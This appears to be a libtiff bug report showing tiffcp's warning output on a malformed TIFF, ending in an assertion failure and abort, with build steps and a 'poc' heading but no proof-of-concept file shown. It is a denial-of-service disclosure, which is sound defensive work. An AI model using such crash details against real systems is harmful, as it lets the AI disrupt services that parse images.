    Fax4Decode: Warning, Premature EOF at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 4 (0x4) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3 (0x3) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 5 (0x5) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 55941 (0xda85) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 51248 (0xc830) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 31350 (0x7a76) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 59310 (0xe7ae) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65535 (0xffff) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 436 (0x1b4) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 64790 (0xfd16) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 2048 (0x800) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 6010 (0x177a) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 60138 (0xeaea) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 16384 (0x4000) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 59904 (0xea00) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 8832 (0x2280) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 24655 (0x604f) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 62085 (0xf285) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 59152 (0xe710) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 27651 (0x6c03) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 392 (0x188) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 769 (0x301) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 0 (0x0) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 38573 (0x96ad) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 60159 (0xeaff) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 6144 (0x1800) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 12076 (0x2f2c) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 5327 (0x14cf) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 8289 (0x2061) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 34828 (0x880c) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 31820 (0x7c4c) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 62632 (0xf4a8) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 12006 (0x2ee6) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 50183 (0xc407) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3840 (0xf00) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 16 (0x10) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 31365 (0x7a85) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 252 (0xfc) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 30069 (0x7575) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 18763 (0x494b) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3505 (0xdb1) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 1 (0x1) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 9 (0x9) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 1002 (0x3ea) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 770 (0x302) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 59925 (0xea15) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 18761 (0x4949) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 2 (0x2) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 32768 (0x8000) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 58339 (0xe3e3) encountered.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 4"; tag ignored.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 3"; tag ignored.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 5"; tag ignored.
    TIFFFetchNormalTag: Warning, Incorrect value for "Model"; tag ignored.
    TIFFFetchNormalTag: Warning, IO error during reading of "DocumentName"; tag ignored.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 436"; tag ignored.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 16384"; tag ignored.
    TIFFReadDirectory: Warning, Ignoring ColorMap because BitsPerSample=48>24.
    TIFFFetchNormalTag: Warning, Sanity check on size of "Tag 1" value failed; tag ignored.
    TIFFFetchNormalTag: Warning, ASCII value for tag "DateTime" contains null byte in value; value incorrectly truncated during reading due to implementation limitations.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 2"; tag ignored.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 58339"; tag ignored.
    TIFFFetchStripThing: Warning, Incorrect count for "StripOffsets"; tag ignored.
    tiffcp: tif_read.c:99: TIFFReadAndRealloc: Assertion `(tif->tif_flags & TIFF_MYBUFFER) != 0' failed.
    Aborted

Platform

\`\`\`
$ uname -a
Linux wdw-Precision-Tower-3620 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86\_64 x86\_64 x86\_64 GNU/Linux

**\# MUST install the libjbig support!**
$ sudo apt install -y libjbig-dev
$ CFLAGS="-g -O0" CXXFLAGS="-g -O0" ./configure --disable-shared
$ make -j;make install; make clean
\`\`\`

poc

Edited Feb 24, 2022 by 4ugustus

Tag

#dos